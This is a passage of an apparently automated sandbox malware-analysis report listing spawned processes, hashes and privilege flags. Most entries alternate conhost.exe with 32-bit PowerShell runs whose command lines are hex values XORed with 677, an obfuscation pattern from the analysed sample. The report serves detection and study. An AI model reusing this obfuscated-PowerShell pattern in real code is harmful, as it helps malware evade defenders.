                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:52
                                                            Start time:09:35:18
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:53
                                                            Start time:09:35:19
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x6F632ACC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:54
                                                            Start time:09:35:19
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:55
                                                            Start time:09:35:19
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x302C6B85 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:56
                                                            Start time:09:35:19
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:57
                                                            Start time:09:35:20
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x30783395 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:58
                                                            Start time:09:35:20
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:59
                                                            Start time:09:35:21
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x30303295 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:60
                                                            Start time:09:35:21
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:61
                                                            Start time:09:35:22
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x2C206B85 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:62
                                                            Start time:09:35:22
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:63
                                                            Start time:09:35:22
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x30783195 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:64
                                                            Start time:09:35:22
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:65
                                                            Start time:09:35:23
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x30302E85 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:66
                                                            Start time:09:35:23
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:67
                                                            Start time:09:35:24
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x692032DD -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:68
                                                            Start time:09:35:24
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:69
                                                            Start time:09:35:24
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x34302BD5 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:70
                                                            Start time:09:35:25
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:71
                                                            Start time:09:35:25
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x2E7233FC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:72
                                                            Start time:09:35:25
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:73
                                                            Start time:09:35:26
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x6B6570CB -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:74
                                                            Start time:09:35:26
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:75
                                                            Start time:09:35:27
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x656C3197 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:76
                                                            Start time:09:35:27
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:77
                                                            Start time:09:35:28
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x3A3A51C0 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:78
                                                            Start time:09:35:28
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:79
                                                            Start time:09:35:29
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x74466BC9 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:80
                                                            Start time:09:35:29
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:81
                                                            Start time:09:35:29
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x65506DCC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:82
                                                            Start time:09:35:29
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:83
                                                            Start time:09:35:30
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x6E7467D7 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:84
                                                            Start time:09:35:30
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:85
                                                            Start time:09:35:31
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x28697096 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:86
                                                            Start time:09:35:31
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:87
                                                            Start time:09:35:31
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x2C206B85 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:88
                                                            Start time:09:35:32
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:89
                                                            Start time:09:35:32
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x31343091 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:90
                                                            Start time:09:35:32
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:91
                                                            Start time:09:35:33
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x202C22CC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:92
                                                            Start time:09:35:33
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:93
                                                            Start time:09:35:34
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x20302ECC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:94
                                                            Start time:09:35:34
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:95
                                                            Start time:09:35:34
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x20302BCC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:96
                                                            Start time:09:35:35
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:97
                                                            Start time:09:35:35
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x2E7230FC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:98
                                                            Start time:09:35:35
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:99
                                                            Start time:09:35:36
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x6B6570CB -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:100
                                                            Start time:09:35:36
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:101
                                                            Start time:09:35:37
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x656C3197 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:102
                                                            Start time:09:35:37
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:103
                                                            Start time:09:35:38
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x3A3A50C0 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:104
                                                            Start time:09:35:38
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:105
                                                            Start time:09:35:38
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x616444CC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:106
                                                            Start time:09:35:38
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:107
                                                            Start time:09:35:39
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x6C652ACC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:108
                                                            Start time:09:35:39
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:109
                                                            Start time:09:35:40
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x72332E85 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:110
                                                            Start time:09:35:40
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:111
                                                            Start time:09:35:41
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x69207094 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:112
                                                            Start time:09:35:41
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:113
                                                            Start time:09:35:41
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x2C206B85 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:114
                                                            Start time:09:35:41
                                                            Start date:05/10/2022
